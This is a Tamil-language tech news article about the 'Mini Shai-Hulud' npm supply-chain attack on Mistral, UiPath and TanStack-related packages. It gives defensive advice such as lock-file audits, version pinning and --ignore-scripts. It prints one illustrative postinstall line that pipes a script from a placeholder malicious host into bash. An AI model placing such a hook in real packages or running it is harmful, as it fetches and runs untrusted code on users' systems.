‹ முகப்புக்கு திரும்ப

npm‑ல் Mistral, UiPath, TanStack பாக்கேஜ் களுக்கு Mini Shai‑Hulud தாக்குதல்

Mistral, UiPath, React‑Router‑ல் பயன்படுத்தப்படும் npm பாக்கேஜ்கள் ஹேக் ஆனது. எப்படி பாதுகாப்பது, இந்திய டெவலப்பருக்கு என்ன முக்கியம் – இங்குதான் சொல்றோம்.

Keerthika 6 min read
Google-ல் Follow
அப்டேட் 1 மாதம் முன்
Security npm‑ல் Mistral, UiPath, TanStack பாக்கேஜ் களுக்கு Mini Shai‑Hulud தாக்குதல் 6 நிமிடம் மீதம் Google-ல் Follow
npm‑ல் Mistral, UiPath, TanStack பாக்கேஜ் களுக்கு Mini Shai‑Hulud தாக்குதல்

தமிழ்டெக் AI சுருக்கம்

பாதுகாப்பு ஆராய்ச்சியாளர்கள் npm registry-ல Mistral, UiPath, TanStack தொடர்பான packages-ல Mini Shai-Hulud என்கிற சிறிய backdoor தாக்குதலை கண்டுபிடிச்சிருக்காங்க. Package install ஆகும்போது postinstall script remote server-ல இருந்து malicious code-ஐ curl-bash மூலம் pull பண்ணி run பண்ணி, crypto-miner அல்லது credential-stealer போன்றவற்றை system-ல போடலாம். Mistral client utilities, UiPath Node SDK, React-Router helper packages பாதிக்கப்பட்டிருக்கு; இவை இந்திய fintech, e-commerce, startups-ல அதிகம் use ஆகுறதால production-ல data breach அல்லது payment gateway ஆபத்து வரலாம். உங்க project secure ஆக்க lock-file-ஐ audit பண்ணி versions-ஐ pin பண்ணுங்க, CI-ல npm ci --ignore-scripts use பண்ணுங்க, unknown domain traffic-ஐ monitor பண்ணுங்க. npm malicious packages-ஐ எடுத்துட்டாலும் already install பண்ணியிருந்தா impact இருக்கும்னா security advisories follow பண்ணி lock-file-ஐ regular-ஆ update பண்ணுங்க.

  • Mini Shai‑Hulud npm‑ல் Mistral, UiPath, TanStack React‑Router பாக்கேஜ்-களில் malicious postinstall script சேர்த்தது.
  • இந்தக் கோடு production server‑ல் crypto‑miner அல்லது credential‑stealer ஆக மாறி Indian fintech‑களை ஆபத்தில் ஆழ்த்தும்.
  • உடனடி நடவடிக்கை: lock‑file audit, version pin, CI‑ல் `--ignore-scripts` பயன்படுத்துதல்.

AI உதவியுடன் தயாரான சுருக்கம் — தமிழ்டெக் எடிட்டர்ஸ் சரிபார்த்தது.

0:00
0:00
🔒 Listen வசதி subscribers-க்கு மட்டும். Subscribe செய்யுங்கள்

செய்தி என்ன?

கடைசியாக சில நாட்களுக்கு முன்பு, பாதுகாப்பு ஆராய்ச்சியாளர்கள் npm ரெஜிஸ்ட்ரியில் Mistral (LLM ஃப்ரேம்வொர்க்), UiPath (RPA) மற்றும் TanStack (React‑Router) சார்ந்த பாக்கேஜ்களில் சிறு பின்ஹுக் (backdoor) சேர்க்கப்பட்டதை கண்டுபிடித்தார்கள். இந்த தாக்குதலுக்கு "Mini Shai‑Hulud" என்ற பெயர். பாக்கேஜ் install ஆகும் போது, postinstall ஸ்கிரிப்ட் தன்னிச்சையாக தொலைநிலை சர்வரிலிருந்து தீங்கு விளைவிக்கும் கோடை pull‑அண்டு‑run செய்கிறது.

தொலைநிலை ஸ்கிரிப்ட் எப்படி வேலை செய்கிறது?

npm install செய்யும் ஒவ்வொரு முறையும், பாக்கேஜ் உள்ள postinstall ஸ்கிரிப்ட் கீழ் காட்டியபடி ஒரு curl‑bash ஒர்லைனர் இயக்கும்:

#!/usr/bin/env node
require('child_process').execSync('curl -s https://malicious.example.com/install.sh | bash');

அது crypto‑miner, credential‑stealer அல்லது பிற malicious payload ஐ system‑ல் படைக்கலாம். டெவலப்பர்கள் postinstall‑ஐப் பார்த்து review செய்யாமல் விடுவதால், இந்த கொடூரம் எளிதாக பறிக்கிறது.

எது பாதிக்கப்பட்டது?

  • Mistral: mistral-client, mistral-utils போன்ற பாக்கேஜ்கள். இந்திய fintech மற்றும் e‑commerce start‑ups இவைகளை LLM‑ஆதாரமாக பயன்படுத்துகின்றன.
  • UiPath: uipath-node-sdk – bots‑ஐ Node‑லிருந்து trigger செய்யப் பயன்படும்.
  • TanStack (React‑Router): react-router-dom-helpers, router-guard போன்ற சிறிய utility பாக்கேஜ்கள். React‑Router தான் பெரும்பாலான web‑app‑களின் backbone, எனவே impact பெரியது.

இந்தச் சிக்கல் இந்திய டெவலப்பருக்கு ஏன் முக்கியம்?

நம்முடைய பல startup‑கள், e‑commerce, health‑tech, even govt portals எல்லாம் npm‑ல் நம்பிக்கை வைத்து கட்டிக்கொள்கின்றன. ஒரு compromised பாக்கேஜ் production server‑ல் crypto‑miner‑ஆக மாறினால், electricity bill‑கள் sky‑high ஆகும், data breach‑கள் ஏற்பட்டு UPI, GPay, PayTM போன்ற payment gateway‑கள் ஆபத்தில் படும்.

உங்கள் project‑ஐ இப்போதே secure பண்ண எப்படி?

  1. முதலில், lock‑file‑ஐ audit பண்ணுங்கள். npm audit ஓடிச்செல்ல, postinstall script கொண்ட package எதுவும் இல்லையா பாருங்கள்.
  2. Version‑களை pin பண்ணுங்கள். package-lock.json‑ல் exact version‑களை எழுதுங்கள், ^ அல்லது ~ பயன்படுத்தாதீர்கள்.
  3. CI pipeline‑ல் npm ci --ignore-scripts பயன்படுத்தி, scripts-ஐ manual review‑க்கு மட்டும் enable பண்ணுங்கள்.
  4. node_modules மற்றும் lock‑file‑ஐ delete பண்ணி, clean machine‑ல் npm ci ரன் பண்ணுங்கள்.
  5. install நேரம் network traffic‑ஐ monitor பண்ணுங்கள். unknown domain‑க்கு outbound call வந்தால் flag பண்ணுங்கள்.

நீண்டகால பாதுகாப்பு நடைமுறைகள்

npm‑ஐ “trust but verify” mindset‑ல வைத்திருக்க வேண்டும்.

  • Production‑ல் npm ci --prefer-offline பயன்படுத்தி, cached packages‑ஐ மட்டும் install பண்ணுங்கள்.
  • Dependabot, Snyk போன்ற automated security tools‑ஐ enable பண்ணி, suspicious postinstall hook-களை flag செய்யுங்கள்.
  • critical automation code‑ஐ Go அல்லது Rust போன்ற compiled language‑ல எழுதுங்கள் – supply‑chain attack‑களுக்கு அது hard target.

TamilTech-ஓட கருத்து

JavaScript இன் supply‑chain attack‑கள் இப்போது சாதாரணம். Mini Shai‑Hulud போல “minor utility” பாக்கேஜ்-களும் weapon‑ஆக மாறலாம். நம்மை எல்லாம் npm install‑ஐ ஒரு security event மாதிரி treat பண்ணவேண்டும்.

குறிப்பாக, புதிய maintainer‑களின் பாக்கேஜ்-களை எடுக்கும்முன் அவர்களின் GitHub activity, stars, followers‑ஐ check பண்ணுங்கள். Few followers மற்றும் zero issues என்றால், அது red flag தான்.

அடுத்தது என்ன?

npm தான் malicious பாக்கேஜ்-களை takedown பண்ணியிருக்கிறது, ஆனா நீங்கள் ஏற்கனவே install செய்து இருந்தால் impact இருந்தே இருக்கும். அடுத்த சில நாட்களில் npm security advisory‑கள் வந்து, fake patches வேகமாக வெளியாகலாம். அதனால், உங்கள் lock‑file‑ஐ regular‑ஆக update பண்ணி, security alerts‑ஐ follow பண்ணுங்கள்.

நாங்கள் தொடர்ந்து இந்த விஷயத்தை track பண்ணி, எந்த புதிய indicator of compromise (IOC) வந்தாலும் இங்குப் புதுப்பித்து தருவோம்.

நாளைய டெக் செய்திகள் உங்க WhatsApp-க்கே

தினமும் ஒரு சின்ன update, இலவசம். TamilTech channel-ஐ follow பண்ணுங்க.

What do you think?

people reacted

Keerthika

தமிழ்டெக் எடிட்டோரியல் டீம் · 3,346 கட்டுரைகள்

Keerthika is an editor at TamilTech, the Tamil and English technology publication founded by Praveen Kumar S. She covers AI, smartphones, gadgets, EVs, startups and cybersecurity i...

மேலும் Keerthika

WhatsApp-ல் TamilTech-ஐக் கேளுங்க

டெக் சந்தேகமா? தமிழிலோ ஆங்கிலத்திலோ கேளுங்க — எங்க WhatsApp அசிஸ்டன்ட் TamilTech கட்டுரைகளில் இருந்து சில நொடிகளில் பதில் சொல்லும்.

தொடர்புடைய செய்திகள்

கருத்துகள் (0)

| Supports **bold**, *italic*, `code`

Be the first to comment!

அடுத்த செய்தி PixelLeak: AI Coding Agents 13,000 கம்பெனி Screenshots-ஐ GitHub-ல Public ஆக்கிடுச்சு
Tamiltech

Tamiltech

Install app for faster access

Earn XP 🏆
WhatsApp
Notifications